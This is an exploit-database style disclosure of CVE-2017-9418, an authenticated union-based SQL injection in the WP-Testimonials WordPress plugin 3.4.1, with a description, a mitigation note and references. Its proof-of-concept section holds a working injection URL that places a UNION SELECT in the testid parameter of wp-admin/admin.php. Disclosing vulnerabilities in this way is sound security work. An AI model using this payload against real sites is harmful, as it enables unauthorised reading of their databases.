42 lines
No EOL
1 KiB
Text
42 lines
No EOL
1 KiB
Text
# Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection
|
|
# Date: 03-06-2017
|
|
# Exploit Author: Dimitrios Tsagkarakis
|
|
# Website: dtsa.eu
|
|
# Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/
|
|
# Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
|
|
# Version: 3.4.1
|
|
# CVE : CVE-2017-9418
|
|
|
|
# Category: webapps
|
|
|
|
|
|
|
|
1. Description:
|
|
|
|
|
|
|
|
SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for
|
|
WordPress allows an authenticated user to execute arbitrary SQL commands via
|
|
the testid parameter to wp-admin/admin.php.
|
|
|
|
2. Proof of Concept:
|
|
|
|
http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedi
|
|
t&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL--
|
|
comment
|
|
|
|
3. Solution:
|
|
|
|
|
|
|
|
The plugin has been removed from WordPress. Deactivate the plug-in and wait
|
|
for a hotfix.
|
|
|
|
|
|
|
|
4. Reference:
|
|
|
|
http://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-inje
|
|
ction-sqli/
|
|
|
|
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418 |